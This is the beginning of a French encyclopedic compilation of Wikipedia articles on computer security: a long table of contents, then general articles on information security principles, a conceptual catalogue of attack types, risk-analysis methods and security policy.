La Sécurité Informatique Edition Livres Pour Tous (

La sécurité informatique Edition Livres pour tous (www.livrespourtous.com)

PDF générés en utilisant l’atelier en source ouvert « mwlib ». Voir http://code.pediapress.com/ pour plus d’informations. PDF generated at: Sat, 13 Jul 2013 18:26:11 UTC Contenus

Articles

1-Principes généraux 1 Sécurité de l'information 1 Sécurité des systèmes d'information 2 Insécurité du système d'information 12 Politique de sécurité du système d'information 17 Vulnérabilité (informatique) 21 Identité numérique (Internet) 24

2-Attaque, fraude, analyse et cryptanalyse 31

2.1-Application 32 Exploit (informatique) 32 Dépassement de tampon 34 Rétroingénierie 40 Shellcode 44

2.2-Réseau 47 Attaque de l'homme du milieu 47 Attaque de Mitnick 50 Attaque par rebond 54 Balayage de port 55 Attaque par déni de service 57 Empoisonnement du cache DNS 66 Pharming 69 Prise d'empreinte de la pile TCP/IP 70 Usurpation d'adresse IP 71 Wardriving 73

2.3-Système 74 Écran bleu de la mort 74 Fork bomb 82

2.4-Mot de passe 85 Attaque par dictionnaire 85 Attaque par force brute 87

2.5-Site web 90 Cross-site scripting 90 Défacement 93

2.6-Spam/Fishing 95 Bombardement Google 95 Fraude 4-1-9 99 Hameçonnage 102

2.7-Cloud Computing 106 Sécurité du cloud 106

3-Logiciel malveillant 114 Logiciel malveillant 114 Virus informatique 120 Ver informatique 125 Cheval de Troie (informatique) 129 Hacktool 131 Logiciel espion 132 Rootkit 134 Porte dérobée 145 Composeur (logiciel) 149 Charge utile 150 Fichier de test Eicar 151 Virus de boot 152

4-Concepts et mécanismes de sécurité 153 Authentification forte 153 Élévation des privilèges 159 Sécurité par l'obscurité 160 Séparation des privilèges 162 Système de détection d'intrusion 163 Système de prévention d'intrusion 168 Pare-feu (informatique) 171 Honeypot 175 CAPTCHA 177 Durcissement 181 Fuzzing 182 Zone démilitarisée (informatique) 183

5-Contrôle d'accès en sécurité informatique 184

5.1-Types 185 Contrôle d'accès obligatoire 185 Contrôle d'accès discrétionnaire 185 Contrôle d'accès à base de rôles 186 Contrôle d'accès à base de règles 187

5.2-Modèles 188 Modèle de Bell-La Padula 188 Modèle de Biba 188 Modèle de Brewer et Nash 189 Modèle de Clark-Wilson 190 Modèle de Graham-Denning 190

5.3-Divers 191 Access Control List 191 Sécurité multiniveau 193

6-Logiciel de sécurité informatique 195

6.1-Types 196 Logiciel antivirus 196 Lutte anti-spam 199 Pare-feu personnel 208 Analyseur de paquets 209

6.2-Exemples 211 Ad-Aware 211 BSD Jail 213 Chroot 214 OpenSSL 214 HijackThis 215 Chkrootkit 217 ClamAV 218 NOD32 220 Back Orifice 221 Secure Shell 223 Nessus (logiciel) 225 Nmap 227 Traceroute 229 GNU Privacy Guard 231 Pretty Good Privacy 233 Netfilter 235

7-Systèmes d'exploitation et pare-feu basés sur la sécurité 238 FreeBSD 238 NetBSD 245 OpenBSD 249 Adamantix 255 ClosedBSD 255 IPCop 256 Grsecurity 259 SELinux 260

8-Matériel de sécurité informatique 262 Carte à puce 262 Cisco PIX 268 Hardware Security Module 270 YesCard 271 Trusted Platform Module 272 SecurID 273 Unified threat management 274

9-Cryptographie moderne 276 Cryptographie 276 Stéganographie 279 Certificat électronique 287 Identité numérique 291 Infrastructure à clés publiques 291 Signature numérique 295 Canal caché 299

10-Normes et technologies 301 Trusted Computer System Evaluation Criteria 301 Information Technology Security Evaluation Criteria 302 Critères communs 302 ISO/CEI 27001 306 ISO/CEI 17799 311

11-Organismes 312

11.1-Type 313 Computer Emergency Response Team 313

11.2-Organismes internationaux 315 Information Security Forum 315 Open Web Application Security Project 316

11.3-Aux Etats-Unis 317 CERT Coordination Center 317 International Information Systems Security Certification Consortium 317 Trusted Computing Group 318

11.4-Au Québec 320 Institut de la sécurité de l'information du Québec 320

11.5-En Europe 321 European Institute for Computer Antivirus Research 321 Office fédéral de la sécurité des technologies de l'information 322

11.7-En France 323 Club de la sécurité de l'information français 323 Observatoire de la sécurité des systèmes d'information et des réseaux 324 Commission nationale de l'informatique et des libertés 326 Agence nationale de la sécurité des systèmes d'information 335 Centre d'expertise gouvernemental de réponse et de traitement des attaques informatiques 339

12-Culture informatique : hacker, cracker 341

12.1-Principes 342 Hacking 342 Hack 345 Crack (informatique) 347

12.2-Acteurs 350 Hacker (sécurité informatique) 350 Cracker (informatique) 354 White hat 355 Grey hat 356 Black hat 357 Chaos Computer Club 358 Hacking For Girliez 361

13-Personnalités 362

13.1-Hackers 363 Boris Floricic 363 Kevin Mitnick 364 Mudge (hacker) 369 Kevin Poulsen 370 Theo de Raadt 373

13.2-Cryptologues 375 Leonard Adleman 375 Charles H. Bennett 377 Gilles Brassard 377 Don Coppersmith 379 Whitfield Diffie 380 Hans Dobbertin 381 Taher Elgamal 382 Horst Feistel 383 Martin Hellman 383 Xuejia Lai 384 Arjen Lenstra 385 James Massey 386 Ralph Merkle 387 David Naccache 388 Phong Nguyen 389 Bart Preneel 390 Ronald Rivest 391 Bruce Schneier 392 Adi Shamir 394 Dmitry Sklyarov 396 Jacques Stern (cryptologue) 397 Philip Zimmermann 399

13.3-Autres 401 Serdar Argic 401 Michael Calce 402 Edward Snowden 403

14-Publications et sites web de référence 424 Misc 424 Hakin9 424 Phrack 425 Réseaux & Télécoms 427 Hackademy Magazine 427 Die Datenschleuder 428 2600: The Hacker Quarterly 429 Cult of the Dead Cow 430 Le Virus informatique 431 SANS Institute 432 SecurityFocus 433

15-Romans et films 434 23 (film) 434 Cybertraque 435 Die Hard 4 : Retour en enfer 436 EXistenZ 442 Forteresse digitale 445 Hackers 448 Les Experts 451 Matrix 451 Traque sur Internet (film) 460 Tron 463 Wargames (film) 469 Références

Sources et contributeurs de l’article 472 Source des images, licences et contributeurs 481 Licence des articles Licence 485 1

1-Principes généraux

Sécurité de l'information

Cet article ne cite pas suffisamment ses sources (avril 2009). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

La sécurité de l'information est un processus visant à protéger des données. La sécurité de l'information n'est confinée ni aux systèmes informatiques, ni à l'information dans sa forme numérique ou électronique. Au contraire, elle s'applique à tous les aspects de la sûreté, la garantie, et la protection d'une donnée ou d'une information, quelle que soit sa forme.

Définition La plupart des définitions de la sécurité de l'information tendent à cibler, quelquefois exclusivement, sur des utilisations spécifiques ou des medias particuliers. En fait, la sécurité de l'information ne peut pas être définie comme synonyme de la sécurité informatique, de la sécurité système et réseau, de la sécurité des technologies de l'information, de la sécurité du système d'information, ou de la sécurité des technologies de l'information et de la communication. Chacune de ces expressions traite d'un sujet différent, même si le point commun concerne la sécurité de l'information dans quelques-unes de ses formes (ici, sous sa forme électronique) : par conséquent, tous sont des sous-domaines de la sécurité de l'information.

Critères de sensibilité

Trois critères de sensibilité de l'information sont communément acceptés : •• Disponibilité •• Intégrité •• Confidentialité Un quatrième est aussi souvent utilisé (sous différents noms) : • Traçabilité, Imputabilité, ou Preuve

Autres aspects importants

Quelques autres aspects de la sécurité de l'information sont : •• Contrôle d'accès • Identification et authentification •• Information Technology Infrastructure Représentation de la triade D, I, et C. Library •• Sûreté de fonctionnement des systèmes informatiques Sécurité de l'information 2

La cryptographie et la cryptanalyse sont des outils importants pour assurer la confidentialité d'une information (stockée ou transitée), son intégrité (toute modification est détectable), et l'identification de son origine (l'émetteur peut être identifié).

Annexes

Liens externes •• RFC 2828 : Internet Security Glossary (obsolète) •• RFC 4949 : Internet Security Glossary, Version 2

• Portail de la sécurité de l’information

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=S%C3%A9curit%C3%A9_de_l%27information& action=edit

Sécurité des systèmes d'information

Cet article ou cette section adopte un point de vue régional ou culturel particulier et doit être internationalisé. [1] Merci de l'améliorer ou d'en discuter sur sa page de discussion !

La sécurité des systèmes d’information (SSI) est l’ensemble des moyens techniques, organisationnels, juridiques et humains nécessaire et mis en place pour conserver, rétablir, et garantir la sécurité du système d'information. Assurer la sécurité du système d'information est une activité du management du système d'information.

Enjeux de la sécurité des systèmes d'information « Le système d'information représente un patrimoine essentiel de l'organisation , qu'il convient de protéger . La sécurité informatique consiste à garantir que les ressources matérielles ou logicielles d'une organisation sont uniquement utilisées dans le cadre prévu » [2] . Plusieurs types d'enjeux doivent être maitrisés : 1. L'intégrité : Les données doivent être celles que l'on s'attend à ce qu'elles soient, et ne doivent pas être altérées de façon fortuite ou volontaire. 2. La confidentialité : Seules les personnes autorisées ont accès aux informations qui leur sont destinées. Tout accès indésirable doit être empêché. 3. La disponibilité : Le système doit fonctionner sans faille durant les plages d'utilisation prévues, garantir l'accès aux services et ressources installées avec le temps de réponse attendu. 4. La non-répudiation et l'imputation : Aucun utilisateur ne doit pouvoir contester les opérations qu'il a réalisées dans le cadre de ses actions autorisées, et aucun tiers ne doit pouvoir s'attribuer les actions d'un autre utilisateur. 5. L'authentification : L'identification des utilisateurs est fondamentale pour gérer les accès aux espaces de travail pertinents et maintenir la confiance dans les relations d'échange. La sécurité informatique est un défi d'ensemble qui concerne une chaine d'éléments : Les infrastructures matérielles de traitement ou de communication, les logiciels ( systèmes d'exploitation ou applicatifs), les données , le comportement des utilisateurs . Le niveau global de sécurité étant défini par le niveau de sécurité du maillon le plus faible, les précautions et contre-mesures doivent être envisagées en fonction des vulnérabilités propres au contexte auquel le système d'information est censé apporter service et appui. Deux types de dommages peuvent affecter le système d'information d'une organisation: Sécurité des systèmes d'information 3

1. Les dommages financiers. Sous forme de dommages directs (comme le fait d'avoir à reconstituer des bases de données qui ont disparu, reconfigurer un parc de postes informatiques, réécrire une application) ou indirects (par exemple, le dédommagement des victimes d'un piratage, le vol d'un secret de fabrication ou la perte de marchés commerciaux). Un exemple concret : bien qu'il soit relativement difficile de les estimer, des sommes de l'ordre de plusieurs milliards de dollars US ont été avancées suite à des dommages causés par des programmes malveillants comme le ver Code Red. D'autres dommages substantiels, comme ceux liés au vol de numéros de cartes de crédit, ont été déterminés plus précisément. 2. La perte ou la baisse de l'image de marque. Perte directe par la publicité négative faite autour d'une sécurité insuffisante (cas du hameçonnage par exemple) ou perte indirecte par la baisse de confiance du public dans une société. Par exemple, les techniques répandues de defacing (une refonte d'un site web) permettent à une personne mal intentionnée de mettre en évidence des failles de sécurité sur un serveur web. Ces personnes peuvent aussi profiter de ces vulnérabilités pour diffuser de fausses informations sur son propriétaire (on parle alors de désinformation). Les conséquences peuvent aussi concerner la vie privée d'une ou plusieurs personnes, notamment par la diffusion d'informations confidentielles comme ses coordonnées bancaires, sa situation patrimoniale, ses codes confidentiels. De manière générale, la préservation des données relatives aux personnes fait l'objet d'obligations légales régies par la Loi Informatique et Libertés. Pour parer ces éventualités, les responsables de systèmes d'information se préoccupent depuis longtemps de sécuriser les données. Le cas le plus répandu, et sans aucun doute précurseur en matière de sécurité de l'information, reste la sécurisation de l'information stratégique et militaire : Le Department of Defense (DoD) des États-Unis est à l'origine du TCSEC, ouvrage de référence en la matière. De même, le principe de sécurité multi-niveau trouve ses origines dans les recherches de résolution des problèmes de sécurité de l'information militaire. Aujourd'hui, l'hypothèse réaliste demeure que la sécurité ne peut être garantie à 100 % et requiert le plus souvent la mobilisation d'une panoplie de mesures y compris celle des « leurres » reposant sur l'idée qu'interdire ou en tout cas protéger l'accès à une donnée peut consister à fournir volontairement une information « calibrée et visible » servant de paravent à l'information sensible…

Démarche générale Pour sécuriser les systèmes d'information, la démarche consiste à : • évaluer les risques et leur criticité : quels risques et quelles menaces, sur quelle donnée et quelle activité, avec quelles conséquences ? On parle de « cartographie des risques ». De la qualité de cette cartographie dépend la qualité de la sécurité qui va être mise en œuvre. • rechercher et sélectionner les parades : que va-t-on sécuriser, quand et comment ? Etape difficile des choix de sécurité : dans un contexte de ressources limitées (en temps, en compétences et en argent), seules certaines solutions pourront être mises en oeuvre. • mettre en œuvre les protections, et vérifier leur efficacité. C'est l'aboutissement de la phase d'analyse et là que commence vraiment la protection du système d'information. Une faiblesse fréquente de cette phase est d'omettre de vérifier que les protections sont bien efficaces (tests de fonctionnement en mode dégradé, tests de reprise de données, tests d'attaque malveillante, etc.) Sécurité des systèmes d'information 4

Méthodes d'attaque portant atteinte à la sécurité du SI ( voir le site de l'ANSSI et la note d'information N° CERTA-2006-INF-002 relative à la terminologie d'usage ) •• Destruction de matériels ou de supports Sabotage : il vise la mise hors service d'un SI ou de l'une de ses composantes en portant atteinte à l'intégrité des données et surtout à la disponibilité des services. •• Rayonnements électromagnétiques Brouillage : C'est une attaque de haut niveau qui vise à rendre le SI inopérant. •• Écoute passive Écoute : Elle consiste à se placer sur un réseau informatique ou de télécommunication pour collecter et analyser les informations ou les trames qui y circulent Interception de signaux compromettants : l'attaquant tente de récupérer un signal électromagnétique pour l'interpréter et en déduire des informations utilisables. Cryptanalyse : L'attaque de données cryptées est réalisée par interception et analyse des cryptogrammes circulant lors d'une communication ou obtenus par une source quelconque. •• Vol Fraude physique : elle consiste à accéder à l'information par copie illégale des supports physiques ( bandes magnétiques, disquettes, disques classiques ou optiques, listings rangés ou abandonnés imprudemment dans les bureaux, armoires, tiroirs ...) Vol de matériels : concerne les ordinateurs et en particulier les ordinateurs portables. Analyse de supports recyclés ou mis au rebut : "fouille" des poubelles ou des archives d'une organisation ou détournement des processus de maintenance. •• Divulgation Hameçonnage ou filoutage ( Phishing) : désigne l'obtention d'information confidentielle ( comme des codes d'accès ou des mots de passe) en prétextant une fausse demande ou en faisant miroiter un pseudo-avantage auprès d'un utilisateur ciblé. Chantage : menace exercée vis-à-vis d'une personne privée ou d'une organisation en vue d'extorquer une information "sensible". •• Émission d'une information sans garantie d'origine Canular (Hoax) : Vise à désinformer en annonçant l'arrivée d'un événement de nature imaginaire mais censé être fortement perturbateur voire catastrophique (virus) •• Piégeage du logiciel Bombe : Programme dormant dont l'exécution est conditionné par l'occurrence d'un événement ou d'une date . Virus : Programme malicieux capable de faire fonctionner des actions nuisibles pour le SI , et éventuellement de se répandre par réplication à l'intérieur d'un SI. les conséquences sont le plus souvent la perte d'intégrité des données d'un SI, la dégradation voire l'interruption du service fourni. Ver : Programme malicieux qui a la faculté de se déplacer à travers un réseau qu'il cherche à perturber en le rendant totalement ou partiellement indisponible. Piégeage du logiciel : Des fonctions cachées sont introduites à l'insu des utilisateurs à l'occasion de la conception, fabrication, transport ou maintenance du SI Exploitation d'un défaut (bug) : Les logiciels - en particulier les logiciels standards les plus répandus- comportent des failles de sécurité qui constituent autant d'opportunité d'intrusion indésirables Sécurité des systèmes d'information 5

Canal caché : Type d'attaque de très haut niveau permettant de faire fuir des informations en violant la politique de sécurité du SI. Les menaces peuvent concerner 4 types de canaux cachés : Canaux de stockage, Canaux temporels, Canaux de raisonnement, Canaux dits de "fabrication". Cheval de Troie : C'est un programme ou un fichier introduit dans un SI et comportant une fonctionnalité cachée connue seulement de l'agresseur. L'utilisation d'un tel programme par l'utilisateur courant permet à l'attaquant de contourner les contrôles de sécurité en se faisant passer pour un utilisateur interne. Réseau de robots logiciels (Botnet) : réseau de robots logiciels installés sur des machines aussi nombreuses que possible. Les robots se connectent sur des serveurs IRC (Internet Relay chat) au travers desquels ils peuvent recevoir des instructions de mise en œuvre de fonctions non désirées.( envoi de spams, vol d'information, participation à des attaques de saturation ...) Logiciel espion (spyware): est installé sur une machine dans le but de collecter et de transmettre à un tiers des informations sans que l'utilisateur en ait connaissance. facticiel: logiciel factice disposant de fonctions cachées •• Saturation du Système informatique Perturbation : Vise à fausser le comportement du SI ou à l'empêcher de fonctionner comme prévu (saturation, dégradation du temps de réponse, génération d'erreurs) Saturation : Attaque contre la disponibilité visant à provoquer un déni de service (remplissage forcé d'une zone de stockage ou d'un canal de communication) Pourriel (spam) : Envoi massif d'un message non sollicité vers des utilisateurs n'ayant pas demandé à recevoir cette information. Cet usage - non forcément hostile- contribue cependant à la pollution et à la saturation des systèmes de messagerie. •• Utilisation illicite des matériels Détournement d'utilisation normale : Utilise un défaut d'implantation ou de programmation de manière à faire exécuter à distance par la machine victime un code non désiré, voire malveillant. Fouille : En cas de mauvaise gestion des protections informatiques, celles-ci peuvent être contournées et laisser accéder aux fichiers de données par des visiteurs non autorisés. Mystification : Simulation du comportement d'une machine pour tromper un utilisateur légitime et s'emparer de son nom et mot de passe Trappe : Fonctionnalité utilisée par les développeurs pour faciliter la mise au point de leurs programmes. Lorsqu'elle n'est pas enlevée avant la mise en service du logiciel, elle peut être repérée et servir de point de contournement des mesures de sécurité. Asynchronisme : Ce mode de fonctionnement crée des files d'attente et des sauvegardes de l'état du système. Ces éléments peuvent être détectés et modifiés pour contourner les mesures de sécurité Souterrain : Attaque ciblée sur un élément supportant la protection du SI et exploitant une vulnérabilité existant à un niveau plus bas que celui utilisé par le développeur pour concevoir/tester sa protection. Salami : Comportement d'un attaquant qui collecte des informations de manière parcellaire et imperceptible, afin de les synthétiser par la suite en vue d'une action rapide. (méthode fréquemment utilisée pour les détournements de fonds) Inférence sur les données : L'établissement d'un lien entre un ensemble de données non sensibles peut permettre dans certains cas de déduire quelles sont les données sensibles. •• Altération des données Interception : C'est un accès avec modification des informations transmises sur les voies de communication avec l'intention de détruire les messages, de les modifier, d'insérer des nouveaux messages, de provoquer un Sécurité des systèmes d'information 6

décalage dans le temps ou la rupture dans la diffusion des messages. Balayage (scanning): La technique consiste à envoyer au SI des informations afin de détecter celles qui provoquent une réponse positive. Par suite l'attaquant peut analyser les réponses reçues pour en dégager des informations utiles voire confidentielles ( nom des utilisateurs et profil d'accès ) •• Abus de Droit Abus de droit : caractérise le comportement d'un utilisateur bénéficiaire de privilèges systèmes et/ou applicatifs qui les utilise pour des usages excessifs , pouvant conduire à la malveillance . •• Usurpation de Droit Accès illégitimes : Lorsqu'une personne se fait passer occasionnellement pour une autre en usurpant son identité Déguisement : Désigne le fait qu'une personne se fait passer pour une autre de façon durable et répétée en usurpant son identité, ses privilèges ou les droits d'une personne visée. Rejeu : Variante du déguisement qui permet à un attaquant de pénétrer un SI en envoyant une séquence de connexion d'un utilisateur légitime et enregistrée à son insu. Substitution : Sur des réseaux comportant des terminaux distants, l'interception des messages de connexion-déconnexion peut permettre à un attaquant de continuer une session régulièrement ouverte sans que le système ne remarque le changement d'utilisateur. Faufilement : Cas particulier où une personne non autorisée franchit un contrôle d'accès en même temps qu'une personne autorisée. •• Reniement d'actions Le reniement (ou répudiation) consiste pour une partie prenante à une transaction électronique à nier sa participation à tout ou partie de l'échange d'informations, ou à prétendre avoir reçu des informations différentes (message ou document) de ceux réputés avoir été réalisés dans le cadre du SI.

L'évaluation des risques Tenter de sécuriser un système d'information revient à essayer de se protéger contre les menaces intentionnelles ( voir | Guide des menaces intentionnelles [3]) et d'une manière plus générale contre tous les risques pouvant avoir un impact sur la sécurité de celui-ci, ou des informations qu'il traite.

Méthodes d'analyse de risque Différentes méthodes d'analyse des risques sur le système d'information existent. Voici les trois principales méthodes d'évaluation disponibles sur le marché français : • la méthode EBIOS (Expression des besoins et identification des objectifs de sécurité), développée par l'Agence nationale de la sécurité des systèmes d'information (ANSSI) ; • la méthode MEHARI [4] (Méthode harmonisée d'analyse des risques), développée par le CLUSIF ; • la méthode OCTAVE (Operationally Critical Threat, Asset, and Vulnerability Evaluation), développée par l'Université de Carnegie Mellon (USA). La société MITRE, qui travaille pour le Département de la Défense des États-Unis, a aussi développé en 1998 une méthode d'évaluation des menaces et des vulnérabilités appliquée à l'industrie aérospatiale, et pouvant être généralisée aux infrastructures critiques : NIMS (NAS Infrastructure Management System, NAS signifiant National Aerospace). Même si le but de ces méthodes est identique, les termes et les expressions utilisés peuvent varier. Ceux utilisés ci-dessous sont globalement inspirés de la méthode Feros. Sécurité des systèmes d'information 7

Paradoxalement, dans les entreprises, la définition d'indicateurs « sécurité du SI » mesurables, pertinents et permettant de définir ensuite des objectifs dans le temps, raisonnables à atteindre, s'avère délicate. S'il s'agit d'indicateurs de performances, on peut désigner comme indicateurs les états d'installation d'outils ou de procédures, mais les indicateurs de résultats sont plus complexes à définir et à apprécier, à preuve ceux sur les « alertes virales »[évasif].

Informations sensibles Article détaillé : Sécurité des données. Avant de tenter de se protéger, il convient de déterminer quelles sont les informations sensibles de l'entreprise, qui peuvent être des données, ou plus généralement des actifs représentés par des données. Chaque élément pourra avoir une sensibilité différente. Les actifs contiennent aussi et surtout le capital intellectuel de l'entreprise, qui constitue un patrimoine informationnel à protéger. Il faut évaluer les menaces et déterminer les vulnérabilités pour ces éléments sensibles.

Critères de sécurité La sécurité peut s'évaluer suivant plusieurs critères : • Disponibilité : garantie que ces éléments considérés sont accessibles au moment voulu par les personnes autorisées. • Intégrité : garantie que les éléments considérés sont exacts et complets. • Confidentialité : garantie que seules les personnes autorisées ont accès aux éléments considérés. D'autres aspects peuvent éventuellement être considérés comme des critères (bien qu'il s'agisse en fait de fonctions de sécurité), tels que : • Traçabilité (ou « Preuve ») : garantie que les accès et tentatives d'accès aux éléments considérés sont tracés et que ces traces sont conservées et exploitables. Une fois les éléments sensibles déterminés, les risques sur chacun de ces éléments peuvent être estimés en fonction des menaces qui pèsent sur les éléments à protéger. Il faut pour cela estimer : • la gravité des impacts au cas où les risques se réaliseraient, • la vraisemblance des risques (ou leur potentialité, ou encore leur probabilité d'occurrence). Dans la méthode EBIOS, ces deux niveaux représentent le niveau de chaque risque qui permet de les évaluer (les comparer). Dans la méthode MEHARI, le produit de l'impact et de la potentialité est appelé « gravité ». D'autres méthodes utilisent la notion de « niveau de risque » ou de « degré de risque ».

Menaces Article détaillé : Insécurité du système d'information. Les principales menaces auxquelles un système d’information peut être confronté sont : • un utilisateur du système : l'énorme majorité des problèmes liés à la sécurité d'un système d'information a pour origine un utilisateur, généralement insouciant. Il n'a pas le désir de porter atteinte à l'intégrité du système sur lequel il travaille, mais son comportement favorise le danger ; • une personne malveillante : une personne parvient à s'introduire sur le système, légitimement ou non, et à accéder ensuite à des données ou à des programmes auxquels elle n'est pas censée avoir accès. Le cas fréquent est de passer par des logiciels utilisés au sein du système, mais mal sécurisés; Sécurité des systèmes d'information 8

• un programme malveillant : un logiciel destiné à nuire ou à abuser des ressources du système est installé (par mégarde ou par malveillance) sur le système, ouvrant la porte à des intrusions ou modifiant les données ; des données confidentielles peuvent être collectées à l'insu de l'utilisateur et être réutilisées à des fins malveillantes ; • un sinistre (vol, incendie, dégât des eaux) : une mauvaise manipulation ou une malveillance entraînant une perte de matériel et/ou de données.

Objectifs Une fois les risques énoncés, il est souhaitable de déterminer des objectifs de sécurité. Ces objectifs sont l'expression de l'intention de contrer des risques identifiés et/ou de satisfaire à des politiques de sécurité organisationnelle. Un objectif peut porter sur le système cible, sur son environnement de développement ou sur son environnement opérationnel. Ces objectifs pourront ensuite être déclinés en fonctions de sécurité, implémentables sur le système d'information.

Moyens de sécurisation d'un système

Conception globale La sécurité d'un système d'information peut être comparée à une chaîne de maillons plus ou moins résistants. Elle est alors caractérisée par le niveau de sécurité du maillon le plus faible. Ainsi, la sécurité du système d'information doit être abordée dans un contexte global : • la sensibilisation des utilisateurs aux problématiques de sécurité, ou dans certains cas « prise de conscience » (les anglophones utilisent le terme awareness) ; • la sécurité de l'information ; • la sécurité des données, liée aux questions d'interopérabilité, et aux besoins de cohérence des données en univers réparti ; • la sécurité des réseaux ; • la sécurité des systèmes d'exploitation ; • la sécurité des télécommunications ; • la sécurité des applications (débordement de tampon), cela passe par exemple par la programmation sécurisée ; •• la sécurité physique, soit la sécurité au niveau des infrastructures matérielles (voir la « stratégie de reprise »). Pour certains, la sécurité des données est à la base de la sécurité des systèmes d'information, car tous les systèmes utilisent des données, et les données communes sont souvent très hétérogènes (format, structure, occurrences, …).

Défense en profondeur Article détaillé : Défense en profondeur. Tout droit sorti d'une pratique militaire ancienne et toujours d'actualité, le principe de défense en profondeur revient à sécuriser chaque sous-ensemble du système, et s'oppose à la vision d'une sécurisation du système uniquement en périphérie. De façon puriste, le concept de défense en profondeur signifie que les divers composants d'une infrastructure ou d'un système d'information ne font pas confiance aux autres composants avec lesquels ils interagissent. Ainsi, chaque composant effectue lui-même toutes les validations nécessaires pour garantir la sécurité. En pratique, ce modèle n'est appliqué que partiellement puisqu'il est habituellement impraticable de dédoubler tous les contrôles de sécurité. De plus, il peut même être préférable de consolider plusieurs contrôles de sécurité dans un composant réservé à cette fin. Ce composant doit alors être considéré comme étant sûr par l'ensemble du système. Sécurité des systèmes d'information 9

Politique de sécurité Article détaillé : Politique de sécurité informatique. La sécurité des systèmes d'information se cantonne généralement à garantir les droits d'accès aux données et ressources d'un système, en mettant en place des mécanismes d'authentification et de contrôle. Ces mécanismes permettent d'assurer que les utilisateurs des dites ressources possèdent uniquement les droits qui leur ont été octroyés. La sécurité informatique doit toutefois être étudiée de telle manière à ne pas empêcher les utilisateurs de développer les usages qui leur sont nécessaires, et de faire en sorte qu'ils puissent utiliser le système d'information en toute confiance. C'est la raison pour laquelle il est nécessaire de définir dans un premier temps une politique de sécurité, c'est-à-dire : •• élaborer des règles et des procédures, installer des outils techniques dans les différents services de l'organisation (autour de l'informatique) ; •• définir les actions à entreprendre et les personnes à contacter en cas de détection d'une intrusion ; •• sensibiliser les utilisateurs aux problèmes liés à la sécurité des systèmes d'informations ; •• préciser les rôles et responsabilités. La politique de sécurité est donc l'ensemble des orientations suivies par une entité en termes de sécurité. À ce titre, elle se doit d'être élaborée au niveau de la direction de l'organisation concernée, car elle concerne tous les utilisateurs du système.

Responsable de la sécurité du système d'information Article détaillé : Responsable de la sécurité du système d'information. Cela étant, en France, ce sont principalement les grandes sociétés, entreprises du secteur public et administrations qui ont désigné et emploient, à plein temps ou non, des « responsables de la sécurité des systèmes d'information ». Les tâches de la fonction dépendent du volontarisme politique ; les cadres ou techniciens concernés ont en général une bonne expérience informatique alliée à des qualités de pédagogie, conviction, etc. Peu à peu, le management de la sécurité informatique s'organise en domaines ou sous-domaines des services informatiques ou d'état-major ; ils sont dotés de moyens financiers et humains et intègrent les contrats de plan ou de programmes de l'entreprise. Ainsi, il ne revient pas aux administrateurs informatiques de définir les droits d'accès des utilisateurs mais aux responsables hiérarchiques de ces derniers ou au RSSI (responsable de la sécurité des systèmes d'information), si ce poste existe au sein de l'organisation. Le rôle de l'administrateur informatique est donc de faire en sorte que les ressources informatiques et les droits d'accès à celles-ci soient en cohérence avec la politique de sécurité retenue. De plus, étant donné qu'il est le seul à connaître parfaitement le système, il lui revient de faire remonter les informations concernant la sécurité à sa direction, éventuellement de la conseiller sur les stratégies à mettre en œuvre, ainsi que d'être le point d'entrée concernant la communication aux utilisateurs des problèmes et recommandations en termes de sécurité. Sécurité des systèmes d'information 10

Modèles formels de sécurité Afin d'atteindre une cible d'évaluation avec un bon degré de confiance (niveau E4 de TCSEC au minimum), nous définissons formellement le concept de sécurité dans un modèle dont les objectifs sont les suivants : •• exprimer les besoins de sécurités intégrées dans un contexte informatique, •• fournir des moyens pour justifier que le modèle est cohérent, •• fournir des moyens permettant de convaincre que les besoins sont satisfaits, •• fournir des méthodes permettant de concevoir et d'implanter le système. Il existe plusieurs modèles formels de sécurité : • Le modèle de Bell-LaPadula (gestion d'accès par mandat, confidentialité, statique) modèle qui a été le plus utilisé pour vérifier la sécurité des systèmes informatiques. Les concepteurs de ce modèle ont démontré un théorème appelé Basic Security Theorem (BST). De ce modèle furent dérivés d'autres modèles : celui de Biba (gestion d'accès par mandat, intégrité, statique), celui de Dion (gestion d'accès par mandat, confidentialité et intégrité, statique), de Jajodia et Sandhu (gestion d'accès par mandat, confidentialité, statique). • Le modèle de non-déduction (gestion d'accès par mandat, confidentialité, dynamique) modélisant le flux d'informations en utilisant des concepts de la logique. Les modèles de sécurité basés sur le principe de flux d'informations ont leur utilité dans le contrôle des accès indirects à l'information : ils mettent en évidence le problème des canaux cachés. • Le modèle HRU (gestion d'accès discrétionnaire) et ses dérivés, le modèle Take-Grant et le modèle SPM.

Plan de continuité d'activité Article détaillé : Plan de continuité d'activité (informatique). Face à la criticité croissante des systèmes d'information au sein des entreprises, il est aujourd'hui indispensable de disposer d'un plan de sécurisation de l'activité. Ce plan se décline en deux niveaux distincts : •• le plan de reprise d'activité (PRA) aussi appelé reprise « à froid » qui permet un redémarrage « rapide » de l'activité après un sinistre, avec restauration d'un système en secours avec les données de la dernière sauvegarde •• le plan de continuité d'activité (PCA) également appelé reprise "à chaud" qui, par une redondance d'infrastructure et une réplication intersites permanente des données, permet de maintenir l'activité en cas de sinistres majeur de l'un des sites. Chacun de ces plans tente de minimiser les pertes de données et d'accroitre la réactivité en cas de sinistre majeur ; un PCA efficace, doit en principe, être quasi-transparent pour les utilisateurs, et garantir l'intégrité des données sans aucune perte d'information. La mise en œuvre de telle ou telle solution est souvent déterminée par les contraintes fonctionnelles et budgétaires.

Moyens techniques De nombreux moyens techniques peuvent être mis en œuvre pour assurer une sécurité du système d'information. Il convient de choisir les moyens nécessaires, suffisants, et justes. Voici une liste non exhaustive de moyens techniques pouvant répondre à certains besoins en termes de sécurité du système d'information : • Contrôle des accès au système d'information ; • Surveillance du réseau : sniffer, système de détection d'intrusion ; • Sécurité applicative : séparation des privilèges, audit de code, rétro-ingénierie ; • Emploi de technologies ad hoc : pare-feu, UTM, anti-logiciels malveillants (antivirus, anti-spam, anti-logiciel espion) ; • Cryptographie : authentification forte, infrastructure à clés publiques, chiffrement. Sécurité des systèmes d'information 11

